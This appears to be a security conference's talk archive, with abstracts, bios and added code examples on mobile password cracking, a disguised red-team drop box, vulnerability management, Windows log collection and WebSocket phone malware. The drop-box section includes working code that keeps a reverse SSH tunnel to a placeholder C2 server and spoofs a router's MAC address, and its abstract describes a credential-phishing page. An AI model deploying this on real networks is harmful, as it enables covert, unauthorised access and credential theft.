Archive for the talks Category

Level: Technical

Abstract:

Mobile applications store all kinds of data, and there are different ways to store the critical parts of it. Developers often do realize the importance of encrypting critical data themselves. However, things frequently go wrong despite security checks. In an anonymized example from practice, we will crack an encrypted password to gain access to a mobile bank. We will need to prepare our own code for this, because with classic hacking tools this is not possible.

Bio:

From the very beginning of his professional career, Grega Prešeren has been conducting security audits and penetration tests. Since 2010, he has managed and conducted over 100 security audits of networks, IT services, web, mobile and other applications, industrial systems, etc. In 2015 and 2016, he was a key member of the security team at S&T. Since 2017, he has been working as a cyber security manager at Iskratel and as an ethical hacker at CARBONSEC d.o.o., which he co-founded.

Level: Technical

Abstract:

In this presentation, I will show you how I made a portable gadget suitable for red teamers. The gadget is more or less plug-and-play and is housed in a unique custom-made enclosure. The main component of the gadget is a Raspberry Pi 3, which can be powered from a battery or a power adapter and connected to the network over an Ethernet cable or Wi-Fi. As soon as it is connected, it automatically creates an encrypted tunnel connection (SSH/TLS) over port 443 to the C2 server. I will also explain why an SSH/SSL connection was preferred to a plain TCP or SSH connection. As soon as the connection is established, penetration testing can be performed remotely, from any part of the world. In addition, to avoid easy detection in the attacked network, I decided to disguise the Raspberry Pi as a different type of equipment; in my case, I did my best to disguise it as a router. I spoofed the MAC address to that of the router, hid the SSH protocol version, created a fake router settings login page that looks like the real one, and changed the Apache service name to the router's. In the end, when you compare the scan results with a real router, they look almost identical. In addition, this page is also a phishing page, which waits for a naive admin to try to log in to the router settings. As soon as a login is attempted, the harvested credentials are sent by email. The gadget also includes a Wi-Fi access point, so you can connect to it and control it from a phone or PC. This is very useful if you are trying to get the gadget onto a Wi-Fi network and do not have its Wi-Fi password in advance, since you can add it during the on-site visit.
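The call-home part of such a drop box, as an added example that is not the speaker's code: a supervisor that keeps an SSH reverse tunnel to the C2 host up over TCP/443 and reconnects with capped exponential backoff, plus the iproute2 commands for taking over the router's MAC address. The C2 host name, user, key path and ports are placeholders; the C2 host is assumed to run sshd (or an sshd-behind-TLS listener) on port 443 with the box's public key authorised. Whether the tunnel is wrapped in TLS or not does not change the supervisor; only the listener on the C2 side does.

```python
"""Call-home supervisor for a red-team drop box.

Added example, not the speaker's code.  C2_HOST, C2_USER, KEY_PATH and the
ports are placeholders; the C2 host is assumed to accept SSH on 443.
"""
import re
import subprocess
import time

C2_HOST = "c2.example.invalid"          # placeholder
C2_PORT = 443                           # looks like HTTPS to an egress filter
C2_USER = "dropbox"                     # placeholder
KEY_PATH = "/home/pi/.ssh/id_ed25519"   # placeholder; public half authorised on C2
REMOTE_BIND_PORT = 2222                 # port on the C2 host that lands on this box's sshd
LOCAL_SSH_PORT = 22
IFACE = "eth0"


def build_tunnel_argv(c2_host=C2_HOST, c2_port=C2_PORT, user=C2_USER,
                      key_path=KEY_PATH, remote_port=REMOTE_BIND_PORT,
                      local_port=LOCAL_SSH_PORT):
    """ssh argv for the reverse tunnel.
    -N: tunnel only, no remote shell.  -R: expose this box's sshd on the C2 host.
    ExitOnForwardFailure: exit (and so retry) if the -R bind fails.
    ServerAliveInterval/CountMax: notice a dead session within ~90 s.
    StrictHostKeyChecking=yes: refuse an unknown C2 host key, so a captured
    box cannot be silently redirected to someone else's server.
    BatchMode: never prompt, fail instead."""
    return ["ssh", "-N", "-i", key_path, "-p", str(c2_port),
            "-R", f"{remote_port}:127.0.0.1:{local_port}",
            "-o", "ExitOnForwardFailure=yes",
            "-o", "ServerAliveInterval=30", "-o", "ServerAliveCountMax=3",
            "-o", "StrictHostKeyChecking=yes", "-o", "BatchMode=yes",
            f"{user}@{c2_host}"]


def build_mac_spoof_cmds(mac, iface=IFACE):
    """iproute2 commands that give the interface the real router's MAC, so the
    switch's MAC table and an inventory scan see router hardware, not a Pi."""
    mac = mac.lower()
    if not re.fullmatch(r"([0-9a-f]{2}:){5}[0-9a-f]{2}", mac):
        raise ValueError("MAC must look like aa:bb:cc:dd:ee:ff")
    return [["ip", "link", "set", "dev", iface, "down"],
            ["ip", "link", "set", "dev", iface, "address", mac],
            ["ip", "link", "set", "dev", iface, "up"]]


def backoff_delays(base=5, cap=300, attempts=8):
    """5, 10, 20, 40, 80, 160, 300, 300 seconds: quick first retries, then a
    slow steady beacon that does not flood the network while the C2 is down."""
    return [min(base * 2 ** i, cap) for i in range(attempts)]


def supervise(run=subprocess.call, sleep=time.sleep, clock=time.monotonic,
              max_runs=None):
    """Restart ssh whenever it exits.  run/sleep/clock are injectable so the
    loop can be exercised without a network.  A session that lasted over 60 s
    resets the backoff; short-lived ones (bind failure, blocked egress) escalate it."""
    argv = build_tunnel_argv()
    delays = backoff_delays()
    attempt = runs = 0
    while max_runs is None or runs < max_runs:
        started = clock()
        run(argv)                       # blocks for as long as the tunnel is up
        runs += 1
        if clock() - started > 60:
            attempt = 0
        sleep(delays[min(attempt, len(delays) - 1)])
        attempt += 1
    return runs


if __name__ == "__main__":
    supervise()
```

On the box this runs from a systemd unit (or cron @reboot) as an unprivileged user; the MAC change needs root and should happen before the interface comes up, or the switch sees two MACs from one port.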

Bio:

Boško Banjac is a 35-year-old chemical technology engineer from Slovenia, working in the pharmaceutical industry. For years his biggest passion has been hacking, which he does as a hobby. In the hacking field, he focuses on hacking gadgets, network hacking, creating malware and coding tools/scripts.

Blog:

https://prohackerland.com

Level: Technical

Abstract:

In this presentation, I will show how infrastructural Vulnerability Management looks from the point of view of:

  • Information Security theorists
  • Vulnerability Management vendors
  • IT and IT security staff in particular organizations

I will share my opinion on the vulnerability management process, which should include controls for:

  • Critical Networks and Assets
  • Local Admin credentials
  • Installation of Software (especially of Security Agents)
  • Compliance and asset configuration

Full description:

Historically, infrastructural Vulnerability Management has been understood primarily as a process of detecting and fixing (patching) known software bugs that could theoretically be used in attacks on organizations. Documents written by information security theorists from NIST, PCI and CIS mainly contain formal recommendations: if your VM solution detects a vulnerability with a high enough CVSS base score, then that vulnerability must be fixed within a certain time. Vulnerability Management vendors share a similar position. They offer solutions that detect hundreds and thousands of vulnerabilities using formal criteria, and they are not really interested in how these vulnerabilities will be fixed in real organizations. Only now have they begun to propose approaches such as Predictive Prioritization, which can (with some probability) filter the most critical and exploitable vulnerabilities out of the overall set.

In a real organization, implementing a VM process will provoke a negative attitude from IT. Constantly updating the infrastructure requires a lot of resources. For example, critical Linux kernel vulnerabilities appear every week, and IT departments are usually not ready for this. The problem could be solved by automating the update process, but that requires advanced automated testing after each update (especially for applications), which is also often impossible to implement. As a result, the VM process will either be sabotaged by IT (there are many ways to do this) or limited to a very small scope. In the second case, compensating controls and justifications of why this or that vulnerability is not critical will be actively used, which of course distorts the very idea of VM.

This is often made easier by the fact that information security practitioners do not see a real danger in most existing vulnerabilities, only in those that attackers can easily exploit in the organization (for example, EternalBlue, or vulnerabilities in RDP, SSH, etc.). Such vulnerabilities usually become widely known, and patching them does not require a regular process; it can be handled as a one-time event. At the same time, every large organization has tasks that require control and automation even more urgently than patch management does. These should be the basis of a practical and advanced Vulnerability Management process, since they directly affect the potential attack:

  • If we do not know and do not control some hosts, especially those accessible from the Internet, this is a vulnerability.
  • If we see that some Security Agents are not installed or configured on the hosts (in accordance to the policies), this is a vulnerability.
  • If we have unknown accounts on servers or users with unnecessary local admin permissions on the desktops, this is a vulnerability.
  • If there are hosts with installed software that is not necessary for work – this is a vulnerability. This also includes control over software updates and OS patching, but only as a subtask.
  • If the host is not configured in accordance with security requirements – this is a vulnerability.

And much more, leaving aside control over abnormal host activity (SOC tasks) and control over internal development (AppSec tasks).

Regarding control over updates, I recommend showing the problem (a lot of hosts with critical vulnerabilities) and developing a policy for the organization based on it: accept the risks, patch some particular vulnerabilities, change the patch management and application testing process, etc.
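The five controls listed above, as an added example that is not the speaker's tooling: each control becomes a check over an inventory record, and CVSS-driven patching is kept as the subordinate check the text describes rather than the only one. The `Host` records, the policy sets and the severity scale are constructed; in practice they would be fed from the CMDB, the EDR console, a local-group audit, a software inventory and a compliance scanner, and the severities would reflect the organization's own risk appetite.

```python
"""Asset-centric vulnerability checks for the five controls above.

Added example, not the speaker's tooling.  The inventory, the policy and the
severity scale are constructed placeholders.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Host:
    name: str
    internet_facing: bool = False
    in_cmdb: bool = True                       # known, owned, and in scope
    agents: frozenset = frozenset()            # security agents actually running
    local_admins: frozenset = frozenset()      # members of the local admin group
    software: frozenset = frozenset()          # installed packages
    config_compliant: bool = True              # hardening baseline passed
    max_cvss: float = 0.0                      # worst unpatched CVE on the host


@dataclass(frozen=True)
class Finding:
    host: str
    control: str
    severity: int        # 4 critical .. 1 low (constructed scale)
    detail: str


POLICY = {                                          # constructed policy
    "required_agents": frozenset({"edr", "log-forwarder"}),
    "allowed_local_admins": frozenset({"Administrator", "CORP\\srv-admins"}),
    "approved_software": frozenset({"openssh", "nginx", "postgresql"}),
    "patch_cvss_threshold": 7.0,
}


def evaluate_host(h, policy=POLICY):
    """Return the findings for one host, one per violated control."""
    f = []
    if not h.in_cmdb:                                         # control 1: unknown hosts
        f.append(Finding(h.name, "unknown-host", 4 if h.internet_facing else 3,
                         "not in inventory" + (", reachable from the Internet"
                                               if h.internet_facing else "")))
    missing = policy["required_agents"] - h.agents            # control 2: security agents
    if missing:
        f.append(Finding(h.name, "missing-agent", 3,
                         "missing " + ", ".join(sorted(missing))))
    rogue = h.local_admins - policy["allowed_local_admins"]   # control 3: local admins
    if rogue:
        f.append(Finding(h.name, "local-admin", 3,
                         "unexpected local admins " + ", ".join(sorted(rogue))))
    extra = h.software - policy["approved_software"]          # control 4: unneeded software
    if extra:
        f.append(Finding(h.name, "unapproved-software", 2,
                         "not needed for work: " + ", ".join(sorted(extra))))
    if h.max_cvss >= policy["patch_cvss_threshold"]:          # patching: subtask of control 4
        f.append(Finding(h.name, "patch", 3 if h.internet_facing else 1,
                         f"unpatched CVSS {h.max_cvss}"))
    if not h.config_compliant:                                # control 5: configuration
        f.append(Finding(h.name, "config", 2, "hardening baseline failed"))
    return f


def prioritize(hosts, policy=POLICY):
    """All findings, worst first: an unmanaged Internet-facing box or a missing
    EDR agent outranks the CVSS backlog on an internal host."""
    found = [x for h in hosts for x in evaluate_host(h, policy)]
    return sorted(found, key=lambda x: (-x.severity, x.host, x.control))


SAMPLE_HOSTS = [                                   # constructed inventory
    Host("web-01", internet_facing=True, in_cmdb=False,
         agents=frozenset({"edr"}), max_cvss=9.8),
    Host("db-01", agents=frozenset({"edr", "log-forwarder"}),
         local_admins=frozenset({"Administrator", "CORP\\jdoe"}),
         software=frozenset({"postgresql", "teamviewer"}), max_cvss=7.5),
    Host("app-01", agents=frozenset({"edr", "log-forwarder"}),
         software=frozenset({"nginx"}), max_cvss=5.0),
]

if __name__ == "__main__":
    for x in prioritize(SAMPLE_HOSTS):
        print(f"[{x.severity}] {x.host:8} {x.control:20} {x.detail}")
```

Run against the constructed inventory, the unknown Internet-facing host and the missing agent come out ahead of every CVSS finding, which is the ordering the description argues for.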

Bio:

Alexander Leonov is an information security automation specialist with 10 years of experience in Vulnerability Management, from creating security content for vulnerability scanners to practical implementations of VM processes in organizations.

Blog:

https://avleonov.com/

Level: Technical

Abstract:

Collecting Windows event logs and centralizing them in a Security Information and Event Management (SIEM) system has always been a big challenge for managed security service providers (MSSPs) and for companies taking care of their own system security. Despite the multiple approaches (agent, agentless or hybrid), the landscape remains unclear, and it is hard to find a proper technical solution that takes care of the security constraints imposed by the environment (an Active Directory domain in the enterprise or a Workgroup in OT).

In this talk, we will share how we improved the built-in Windows Event Forwarding (WEF) and Windows Event Collector (WEC) by providing a “crafted toolkit”. Next, new and alternative methods to collect Windows Server DNS logs will be presented. Finally, we discuss how such solutions can help MSSPs or companies to leverage Windows logs and to provide valuable IOCs for threat detection purposes.

Full description:

The Windows Event Forwarding (WEF) feature, implemented in all recent Windows versions, provides the ability to forward Windows logs to a central Windows collector in agentless mode. For that, the free Windows Event Collector role can be used to centralize all logs.

However, the WEC server's built-in collection capabilities are very limited, and it is hard to keep track of what is and is not being collected. Moreover, there is no automated tool to scale up the deployment and manage advanced subscriptions, which define which IOCs/Event IDs to collect.

With this presentation, I would like to:

  • share a technical approach (initially introduced by Palantir) that we use to collect logs from all endpoints together with the WEC server
  • share a PowerShell tool that enhances the WEC server deployment together with the Palantir toolset
  • introduce a new technical solution to collect Windows DNS logs in ETL format or from the ETW channel in order to move away from the former TXT files
  • provide technical architecture solutions to collect DNS logs in ETL/ETW format with an agent (Splunk, NXLog) or without any agent (remote pull)
  • provide an overview of all possible log collection methods for most Microsoft products (SQL Server, Exchange, IIS, PowerShell transcript/TXT, Sysmon, Windows Defender, Microsoft ATA, NPS RADIUS, …).
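The "which Event IDs does this subscription actually collect" problem from the description, as an added example that is neither the speaker's PowerShell tool nor Palantir's: a generator that turns a per-channel Event ID list into a source-initiated WEC subscription, and a reader that pulls the channels and Event IDs back out of an existing subscription file so the collector's coverage can be audited. The channels and Event IDs are constructed; the element layout is assumed to match what `wecutil cs <file>` accepts and should be validated on the collector before deployment. The default SDDL is assumed to grant Domain Computers and Domain Controllers the right to forward.

```python
"""WEC subscription builder and reader.

Added example, not the speaker's or Palantir's tooling.  Channels, Event IDs
and batching values are constructed; validate the output with `wecutil cs`.
"""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "http://schemas.microsoft.com/2004/06/05/subscription"
# Assumed default: allow Domain Computers (DC) and Domain Controllers (DD) to forward
DEFAULT_SDDL = "O:NSG:NSD:(A;;GA;;;DC)(A;;GA;;;DD)"


def xpath_select(channel, event_ids):
    """Event Log XPath that selects only the listed IDs from one channel."""
    ids = " or ".join(f"EventID={int(i)}" for i in sorted(event_ids))
    ch = escape(channel)
    return f'<Select Path="{ch}">*[System[({ids})]]</Select>'


def build_subscription(sub_id, channels, description="", sddl=DEFAULT_SDDL,
                       max_items=1000, max_latency_ms=30000):
    """channels maps a channel name to the Event IDs wanted from it, e.g.
    {"Security": {4624, 4688}, "Microsoft-Windows-Sysmon/Operational": {1, 3}}."""
    queries = "".join(
        f'<Query Id="{n}" Path="{escape(ch)}">{xpath_select(ch, ids)}</Query>'
        for n, (ch, ids) in enumerate(channels.items()))
    return f"""<Subscription xmlns="{NS}">
  <SubscriptionId>{escape(sub_id)}</SubscriptionId>
  <SubscriptionType>SourceInitiated</SubscriptionType>
  <Description>{escape(description)}</Description>
  <Enabled>true</Enabled>
  <Uri>http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog</Uri>
  <ConfigurationMode>Custom</ConfigurationMode>
  <Delivery Mode="Push">
    <Batching><MaxItems>{max_items}</MaxItems><MaxLatencyTime>{max_latency_ms}</MaxLatencyTime></Batching>
    <PushSettings><Heartbeat Interval="3600000"/></PushSettings>
  </Delivery>
  <Query><![CDATA[<QueryList>{queries}</QueryList>]]></Query>
  <ReadExistingEvents>false</ReadExistingEvents>
  <TransportName>http</TransportName>
  <ContentFormat>RenderedText</ContentFormat>
  <Locale Language="en-US"/>
  <LogFile>ForwardedEvents</LogFile>
  <AllowedSourceNonDomainComputers></AllowedSourceNonDomainComputers>
  <AllowedSourceDomainComputers>{sddl}</AllowedSourceDomainComputers>
</Subscription>
"""


def describe_subscription(subscription_xml):
    """Summarize an existing subscription: id, type, forwarder ACL and, per
    channel, the Event IDs its <Select> clauses ask for.  Good enough for the
    'EventID=... or EventID=...' form produced above and by most WEF toolkits;
    a hand-written XPath with other predicates shows up with an empty ID set."""
    root = ET.fromstring(subscription_xml)
    text = lambda tag: (root.findtext(f"{{{NS}}}{tag}") or "").strip()
    channels = {}
    for path, body in re.findall(r'<Select Path="([^"]+)">([^<]*)</Select>', text("Query")):
        channels.setdefault(path, set()).update(
            int(x) for x in re.findall(r"EventID=(\d+)", body))
    return {"id": text("SubscriptionId"), "type": text("SubscriptionType"),
            "enabled": text("Enabled") == "true",
            "sddl": text("AllowedSourceDomainComputers"), "channels": channels}


if __name__ == "__main__":
    xml = build_subscription("Baseline-Security",
                             {"Security": {4624, 4625, 4688},
                              "Microsoft-Windows-Sysmon/Operational": {1, 3}},
                             "constructed example")
    print(xml)
    print(describe_subscription(xml))
```

Running `describe_subscription` over every file a collector exports with `wecutil gs <name> /f:xml` gives the per-channel Event ID map the description says is otherwise hard to keep track of.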

My own project and tools can be found here: https://github.com/mdecrevoisier/windows-event-collector_auto-deploy

Palantir initial project can be found here: https://github.com/palantir/windows-event-forwarding 

Bio:

Michel de Crevoisier is a Security Analyst in the Data Analytics department at Radar Cyber Security in Vienna. Since he joined the company in 2017, he has been working on improving log collection from Microsoft environments in fields like Information Technology (IT) and public clouds. Furthermore, he works on the detection of valuable IOCs to provide advanced use cases for threat detection. During his professional career, he held several positions as a system and network administrator as well as a security architect in France, Spain and Austria. In addition to his practice, Michel regularly speaks at security conferences (Swiss Cyber Storm 2019), at data protection conferences at the French embassy in Vienna and at other business events organized by the French-Austrian chamber of commerce. Michel graduated with an MSc in computer science. During his studies, he was named a Microsoft Student Partner (MSP) and was in charge of organizing talks and conferences presenting the Microsoft ecosystem and its related services and products. At that time, he published several articles on his blog about security hardening and well-known threats like Mimikatz.

Blog:

https://fr.scribd.com/user/57371866/Michel-de-CREVOISIER/uploads

Level: Low Tech

Abstract:

We live in a world where we are not safe! If we leave our devices unlocked, anyone can install anything and control it through the internet. Attendees will see how I built malware that can control mobile phones using WebSockets from anywhere in the world. They will also learn techniques for preventing this kind of application and attack.

We’ll take a look at the following topics:

  • What is malware?
  • Communication Protocols
  • How to build any application with no previous knowledge
  • Real applications I built using Operating System’s APIs

In this talk, I'll show a few applications I built that demonstrate Offensive Programming techniques. These applications were created for fun but could be used in real scenarios, together with tips for preventing security problems.
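The wire format behind the "control it over WebSockets" channel, as an added example that is not the speaker's code: an RFC 6455 frame encoder and decoder with the checks a server must make before trusting a frame (clients must mask every frame, servers must not, control frames must be short and final, RSV bits must be clear). The command payload is constructed; no network I/O is involved, so it runs offline. The decoder handles single frames only and does not reassemble fragmented messages.

```python
"""Minimal RFC 6455 frame codec with the validation a receiver must apply.

Added example, not the speaker's code.  The sample command is constructed.
"""
import os
import struct

OP_CONT, OP_TEXT, OP_BINARY, OP_CLOSE, OP_PING, OP_PONG = 0x0, 0x1, 0x2, 0x8, 0x9, 0xA
_RESERVED = {0x3, 0x4, 0x5, 0x6, 0x7, 0xB, 0xC, 0xD, 0xE, 0xF}


class FrameError(ValueError):
    """Protocol violation; a server answers with a 1002 close, not a guess."""


def _mask(payload, key):
    # XOR with the 4-byte key, repeating; it is symmetric so it also unmasks.
    return bytes(b ^ key[i % 4] for i, b in enumerate(payload))


def encode_frame(payload, opcode=OP_TEXT, mask=True, key=None):
    """One final (FIN=1) frame.  Client->server frames are masked with a fresh
    random key; server->client frames are sent in the clear."""
    mask_bit = 0x80 if mask else 0
    n = len(payload)
    head = bytes([0x80 | opcode])
    if n < 126:
        head += bytes([mask_bit | n])
    elif n < 1 << 16:
        head += bytes([mask_bit | 126]) + struct.pack("!H", n)
    else:
        head += bytes([mask_bit | 127]) + struct.pack("!Q", n)
    if not mask:
        return head + payload
    key = key or os.urandom(4)
    return head + key + _mask(payload, key)


def decode_frame(buf, from_client=True):
    """Parse one frame from the front of buf.
    Returns (fin, opcode, payload, bytes_consumed) or raises FrameError."""
    if len(buf) < 2:
        raise FrameError("incomplete header")
    b0, b1 = buf[0], buf[1]
    if b0 & 0x70:
        raise FrameError("RSV bits set without a negotiated extension")
    fin, opcode = bool(b0 & 0x80), b0 & 0x0F
    if opcode in _RESERVED:
        raise FrameError(f"reserved opcode {opcode:#x}")
    masked, n = bool(b1 & 0x80), b1 & 0x7F
    pos = 2
    if n == 126:
        if len(buf) < 4:
            raise FrameError("incomplete header")
        n, pos = struct.unpack("!H", buf[2:4])[0], 4
    elif n == 127:
        if len(buf) < 10:
            raise FrameError("incomplete header")
        n, pos = struct.unpack("!Q", buf[2:10])[0], 10
        if n >> 63:
            raise FrameError("most significant length bit set")
    if from_client and not masked:
        raise FrameError("client frame not masked")
    if not from_client and masked:
        raise FrameError("server frame must not be masked")
    if opcode >= OP_CLOSE and (n > 125 or not fin):
        raise FrameError("control frames must be final and <= 125 bytes")
    key = b""
    if masked:
        key, pos = buf[pos:pos + 4], pos + 4
    if len(buf) < pos + n:
        raise FrameError("incomplete payload")
    payload = buf[pos:pos + n]
    if masked:
        payload = _mask(payload, key)
    return fin, opcode, payload, pos + n


if __name__ == "__main__":
    # Constructed exchange: the controller sends a command in the clear, the
    # phone-side client answers with a masked frame.
    cmd = encode_frame(b'{"cmd":"screenshot"}', mask=False)
    print(decode_frame(cmd, from_client=False))
    reply = encode_frame(b'{"ok":true,"bytes":0}')
    print(decode_frame(reply))
```

Masking is not confidentiality (the key travels in the frame); it exists so a browser cannot craft bytes that look like an HTTP request to an intermediary. Confidentiality and authentication of the control channel come from TLS and from checking who is on the other end, which is where the prevention techniques belong.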

Bio:

Erick Wendel is a keynote speaker, lead software architect and community co-organizer in Brazil. Named a Microsoft Most Valuable Professional and a Google Developer Expert, he is a specialist in Node.js and JavaScript applications. He is an independent solutions architect who helps companies build better and cheaper applications using serverless architectures, container-based applications and hybrid cloud solutions. He has experience speaking and teaching at the biggest conferences in Brazil and the Americas, and works as a volunteer leader of the NodeBR, JavaScript São Paulo and Nerdzão communities.

Blog:

https://erickwendel.com